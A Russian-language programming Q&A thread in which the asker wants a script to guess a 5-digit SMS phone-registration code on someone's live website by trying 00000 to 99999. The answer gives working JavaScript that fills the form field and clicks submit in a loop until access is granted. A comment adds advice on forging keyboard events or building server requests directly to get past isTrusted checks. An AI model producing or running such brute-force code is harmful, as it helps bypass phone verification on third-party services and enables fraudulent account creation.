# Как запушить свой массив на работающий сайт?

Tags: javascript

помогите составить такой скрипт
Чтобы он вводил в веб форму путем подбора цифрового кода такого вида от 00000 до 99999 код 5-значный пока не найдет нужный.

Примечания:
Скрипт ввел код нажал ENTER не подошел начал второй вводить и так пока не попадет нужный код
Заранее благодарен за помощь !

Вот то что я сам написал

```js
var arr = [],
    track = [],
    min = 10000,
    max = 99999,
    qty = 10000,
    ii = 0,
    rnd;

while (ii < qty) {
    rnd = Math.floor(Math.random() * (max - min + 1)) + min;
    if (!track[rnd]) {
        arr[ii] = track[rnd] = rnd;
        ii += 1;
    }
}
```

Заранее спасибо.

Comment: А как оно будет определять, подошел код или нет?)

Comment: вы же наверное знаете регистрацию через номер телефона, вот туда отправляют же код который нужно ввести в форму, и там надо нажать подтвердить а скрипт должен это делать автоматом пока не найдет подходящий код. Вот я не понимаю как это сделать по гуглил но ни как не могу найти

Answer (score 0):

Написание подобного рода кода очень сильно привязано к сайту, на котором он запускается, поэтому я собрал тестовый стенд и возможное решение задачи

```js
  window.onload= function(){
    // Часть симулирующая работу сайта для проверки работоспособности кода
    let lie = 1;
    document.getElementById("btn").addEventListener('click', function (event) {
      var secretcode = '00078'; // Секретный код, который мы будет подбирать
      if(document.getElementById("input").value==secretcode){document.getElementById("log").innerText="Доступ разрешен"}else{
       document.getElementById("log").innerText="Данный код ошибочный уже "+lie+" раз!";
       lie = lie + 1;
      }
    });
    //////////////////////////////
    // Само решение задачи
    var input = document.getElementById("input");//Находим поле для ввода
    var btn = document.getElementById("btn")//Находим кнопку для отправки сообщения
    var interv;
    document.getElementById("btn2").addEventListener('click', function (event) {
     interv = setInterval(brute,100) //Повторяем функцию, которая будет осуществлять попытку ввода кода
    })
    var num= -1;
    function brute(){//функция, которая вводит код

      num = num + 1;
      var str = num+"";
      var checknumber=''
      if(str.length < 5){
        for(let i = 0; i < 5-str.length; i++){
          checknumber = checknumber + "0";
          
        }
        checknumber = checknumber + num;
      }else{checknumber = checknumber + num;}
      input.value = checknumber;

      btn.click();//жмем на кнопку отправки
      
      if(document.getElementById("log").innerText=="Доступ разрешен"){clearInterval(interv)} // прекращаем работу если угадали с кодом
    }
    }
```

```html
<input type="text" id = "input">
<button id = "btn">Отправить</button>
<button style = "color: red" id = "btn2">Старт</button>
<p id = "log"></p>
```

Comment: `var checknumber=''` это и последующие if-else можно заменить на `var checknumber = ("00000" + num).slice(-5);` или `var checknumber = ("" + num).padStart(5, "0");`

Comment: @OPTIMUS PRIME Да, но я подозреваю, что на его сайте идет прослушка событий клавиатуры и подобный способ может не сработать,  придется вещать события, а если там стоит проверка на isTrusted, то и вовсе придется формировать тело запроса на сервер самостоятельно.

Comment: Спасибо вам всем я попробую это. Очень благодарен!